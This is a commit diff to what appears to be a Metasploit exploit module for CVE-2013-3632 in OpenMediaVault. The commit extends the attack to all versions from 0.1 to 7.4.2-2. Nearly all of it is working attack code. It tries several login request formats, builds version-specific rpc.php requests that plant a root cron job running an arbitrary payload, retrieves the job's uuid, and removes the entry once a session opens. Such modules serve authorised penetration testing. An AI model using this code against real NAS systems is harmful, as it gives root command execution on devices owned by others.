added support for all openmediavault versions (0.1 - 7.4.2-2)

h00die-gr3y · h00die-gr3y · commit b65c7ecb0839 · 2024-07-20T20:55:33.000Z
diff --git a/documentation/modules/exploit/unix/webapp/openmediavault_auth_cron_rce.md b/documentation/modules/exploit/unix/webapp/openmediavault_auth_cron_rce.md
@@ -1,14 +1,21 @@
 ## Vulnerable Application
 
 This is a new module addressing an old vulnerability in OpenMediaVault, an open-source NAS solution.
-The vulnerability exists within all OpenMediaVault versions starting from from `1.0.0` until the recent release `7.3.1-1`
+The vulnerability exists within all OpenMediaVault versions starting from from `0.1` until the recent release `7.4.2-2`
 and it allows an authenticated user to create cron jobs as root on the system.
 An attacker can abuse this by sending a POST request via `rpc.php` to schedule and execute a cron entry
 that runs arbitrary commands as root on the system.
 
 The following releases were tested.
 
 **OpenMediaVault x64 appliances:**
+* openmediavault_0.2_amd64.iso
+* openmediavault_0.2.5_amd64.iso
+* openmediavault_0.3_amd64.iso
+* openmediavault_0.4_amd64.iso
+* openmediavault_0.4.32_amd64.iso
+* openmediavault_0.5.0.24_amd64.iso
+* openmediavault_0.5.48_amd64.iso
 * openmediavault_1.9_amd64.iso
 * openmediavault_2.0.13_amd64.iso
 * openmediavault_2.1_amd64.iso
@@ -30,6 +37,12 @@
 
 **ARM64 on Raspberry PI running Kali Linux 2024-3:**
 * openmediavault 7.3.0-5
+* openmediavault 7.4.2-2
+
+**VirtualBox Images (x64):**
+* openmediavault 0.4.24
+* openmediavault 0.5.30
+* openmediavault 1.0.21
 
 ## Installation steps to install OpenMediaVault NAS appliance
 * Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
diff --git a/modules/exploits/unix/webapp/openmediavault_auth_cron_rce.rb b/modules/exploits/unix/webapp/openmediavault_auth_cron_rce.rb
@@ -18,20 +18,20 @@ def initialize(info = {})
           OpenMediaVault allows an authenticated user to create cron jobs as root on the system.
           An attacker can abuse this by sending a POST request via rpc.php to schedule and execute
           a cron entry that runs arbitrary commands as root on the system.
-          All OpenMediaVault versions including the latest release 7.3.1-1 are vulnerable.
+          All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.
         },
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
-          'Brandon Perry <bperry.volatile[at]gmail.com>', # Original Discovery
-          'Mert BENADAM' # exploit author
+          'Brandon Perry <bperry.volatile[at]gmail.com>' # Original Discovery
         ],
         'References' => [
           ['CVE', '2013-3632'],
           ['PACKETSTORM', '178526'],
+          ['URL', 'https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats'],
           ['URL', 'https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632']
         ],
-        'DisclosureDate' => '2024-05-08',
+        'DisclosureDate' => '2013-10-30',
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
         'Privileged' => true,
@@ -91,6 +91,7 @@ def rpc_success?(res)
 
   def login(user, pass)
     print_status("#{peer} - Authenticating with OpenMediaVault using credentials #{user}:#{pass}")
+    # try the login options for all OpenMediaVault versions
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'rpc.php'),
       'method' => 'POST',
@@ -106,7 +107,42 @@ def login(user, pass)
         options: nil
       }.to_json
     })
-    res&.code == 200 && res.body.include?('"authenticated":true')
+    unless res.code == 200 && res.body.include?('"authenticated":true')
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'rpc.php'),
+        'method' => 'POST',
+        'keep_cookies' => true,
+        'ctype' => 'application/json',
+        'data' => {
+          service: 'Authentication',
+          method: 'login',
+          params: {
+            username: user,
+            password: pass
+          }
+        }.to_json
+      })
+    end
+    unless res.code == 200 && res.body.include?('"authenticated":true')
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'rpc.php'),
+        'method' => 'POST',
+        'keep_cookies' => true,
+        'ctype' => 'application/json',
+        'data' => {
+          service: 'Authentication',
+          method: 'login',
+          params: [
+            {
+              username: user,
+              password: pass
+            }
+          ]
+        }.to_json
+      })
+      return res&.code == 200 && res.body.include?('"authenticated":true')
+    end
+    true
   end
 
   def check_version
@@ -119,20 +155,18 @@ def check_version
       'data' => {
         service: 'System',
         method: 'getInformation',
-        params: nil,
-        options: {
-          updatelastaccess: false
-        }
+        params: nil
       }.to_json
     })
     return nil unless rpc_success?(res)
 
     # parse json response and get the version
     res_json = res.get_json_document
     unless res_json.blank?
-      # OpenMediaVault v4 has a different json format where index 1 has the version information
+      # OpenMediaVault v0.3 - v0.5 and up to v4 have different json formats where index 1 has the version information
       version = res_json.dig('response', 1, 'value')
       version = res_json.dig('response', 'version') if version.nil?
+      version = res_json.dig('response', 'data', 1, 'value') if version.nil?
       return Rex::Version.new(version.split('(')[0].gsub(/[[:space:]]/, '')) unless version.nil?
     end
     nil
@@ -160,34 +194,78 @@ def apply_config_changes
   def execute_command(cmd, _opts = {})
     # OpenMediaFault current release - v6.0.15-1 uses an array definition ['*']
     # OpenMediaVault v3.0.16 - v6.0.14-1 uses a string definition '*'
-    # OpenMediaVault v1.0.0 - v3.0.15 uses a string definition '*' and uuid setting 'undefined'
-    # OpenMediaVault < 1.0.0 is not supported in this module. It will never reach here because the login will fail
-    # MSF module: exploit/multi/http/openmediavault_cmd_exec can be used to exploit these versions
+    # OpenMediaVault v1.0.22 - v3.0.15 uses a string definition '*' and uuid setting 'undefined'
+    # OpenMediaVault v0.2.6.4 - v1.0.31 uses a string definition '*' and uuid setting 'undefined' and no execution parameter
+    # OpenMediaVault < v0.2.6.4 uses a string definition '*' and uuid setting 'undefined', no execution parameter and no everyN parameters
     schedule = @version_number >= Rex::Version.new('6.0.15-1') ? ['*'] : '*'
     uuid = @version_number <= Rex::Version.new('3.0.15') ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4'
-    post_data = {
-      service: 'Cron',
-      method: 'set',
-      params: {
-        uuid: uuid,
-        enable: true,
-        execution: 'exactly',
-        minute: schedule,
-        everynminute: false,
-        hour: schedule,
-        everynhour: false,
-        dayofmonth: schedule,
-        everyndayofmonth: false,
-        month: schedule,
-        dayofweek: schedule,
-        username: 'root',
-        command: cmd.to_s, # payload
-        sendemail: false,
-        comment: '',
-        type: 'userdefined'
-      },
-      options: nil
-    }.to_json
+
+    if @version_number > Rex::Version.new('1.0.32')
+      post_data = {
+        service: 'Cron',
+        method: 'set',
+        params: {
+          uuid: uuid,
+          enable: true,
+          execution: 'exactly',
+          minute: schedule,
+          everynminute: false,
+          hour: schedule,
+          everynhour: false,
+          dayofmonth: schedule,
+          everyndayofmonth: false,
+          month: schedule,
+          dayofweek: schedule,
+          username: 'root',
+          command: cmd.to_s, # payload
+          sendemail: false,
+          comment: '',
+          type: 'userdefined'
+        },
+        options: nil
+      }.to_json
+    elsif @version_number >= Rex::Version.new('0.2.6.4')
+      post_data = {
+        service: 'Cron',
+        method: 'set',
+        params: {
+          uuid: uuid,
+          enable: true,
+          minute: schedule,
+          everynminute: false,
+          hour: schedule,
+          everynhour: false,
+          dayofmonth: schedule,
+          everyndayofmonth: false,
+          month: schedule,
+          dayofweek: schedule,
+          username: 'root',
+          command: cmd.to_s, # payload
+          sendemail: false,
+          comment: '',
+          type: 'userdefined'
+        }
+      }.to_json
+    else
+      post_data = {
+        service: 'Cron',
+        method: 'set',
+        params: [
+          {
+            uuid: uuid,
+            minute: schedule,
+            hour: schedule,
+            dayofmonth: schedule,
+            month: schedule,
+            dayofweek: schedule,
+            username: 'root',
+            command: cmd.to_s, # payload
+            comment: '',
+            type: 'userdefined'
+          }
+        ]
+      }.to_json
+    end
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'rpc.php'),
@@ -203,10 +281,42 @@ def execute_command(cmd, _opts = {})
     res_json = res.get_json_document
     @cron_uuid = res_json.dig('response', 'uuid') || ''
 
+    # In early versions up to 0.4.x cron uuid does not get returned so try an extra query to get it
+    if @cron_uuid.blank?
+      if @version_number >= Rex::Version.new('0.2.6.4')
+        method = 'getList'
+      else
+        method = 'getListByType'
+      end
+      post_data = {
+        service: 'Cron',
+        method: method,
+        params: {
+          start: 0,
+          limit: -1,
+          sortfield: nil,
+          sortdir: nil,
+          type: ['userdefined']
+        }
+      }.to_json
+
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'rpc.php'),
+        'method' => 'POST',
+        'ctype' => 'application/json',
+        'keep_cookies' => true,
+        'data' => post_data
+      })
+      res_json = res.get_json_document
+      # get total list of entries and pick the last one
+      index = res_json.dig('response', 'total')
+      @cron_uuid = res_json.dig('response', 'data', index - 1, 'uuid') || ''
+    end
+
     # Apply and update cron configuration to trigger payload execution (1 minute)
-    res = apply_config_changes
-    fail_with(Failure::Unknown, 'Cannot apply cron changes to trigger payload execution.') unless res && res.code == 200 && res.body.include?('"error":null')
-    print_good('Cron payload execution triggered. Wait at least 1 minute for the session to be established.')
+    # versions lower then 0.5.48 do not need this because execution is automatic
+    apply_config_changes
+    print_status('Cron payload execution triggered. Wait at least 1 minute for the session to be established.')
   end
 
   def on_new_session(_session)
@@ -222,18 +332,15 @@ def on_new_session(_session)
           method: 'delete',
           params: {
             uuid: @cron_uuid.to_s
-          },
-          options: nil
+          }
+          # options: nil
         }.to_json
       })
       if rpc_success?(res)
         # Apply changes and update cron configuration to remove the payload entry
-        res = apply_config_changes
-        if rpc_success?(res)
-          print_good('Cron payload entry successfully removed.')
-        else
-          print_warning('Cannot apply the cron changes to remove the payload entry.')
-        end
+        # versions lower then 0.5.48 do not need this because execution is automatic
+        apply_config_changes
+        print_good('Cron payload entry successfully removed.')
       else
         print_warning('Cannot access the cron services to remove the payload entry. If required, remove the entry manually.')
       end
@@ -246,16 +353,10 @@ def check
     return CheckCode::Unknown('Failed to authenticate at OpenMediaVault.') unless @logged_in
 
     @version_number = check_version
-    unless @version_number.nil?
-      if @version_number.between?(Rex::Version.new('1.0.0'), Rex::Version.new('7.3.1-1'))
-        return CheckCode::Vulnerable("Version #{@version_number}")
-      else
-        return CheckCode::Appears("Version #{@version_number} can be exploited with module exploit/unix/webapp/openmediavault_cmd_exec") if @version_number < Rex::Version.new('1.0.0')
+    return CheckCode::Unknown('Could not retrieve the version information.') if @version_number.nil?
+    return CheckCode::Vulnerable("Version #{@version_number}") if @version_number.between?(Rex::Version.new('0.1'), Rex::Version.new('7.4.2-2'))
 
-        return CheckCode::Detected("Version #{@version_number}")
-      end
-    end
-    CheckCode::Unknown('Could not retrieve the version information.')
+    CheckCode::Detected("Version #{@version_number}")
   end
 
   def exploit
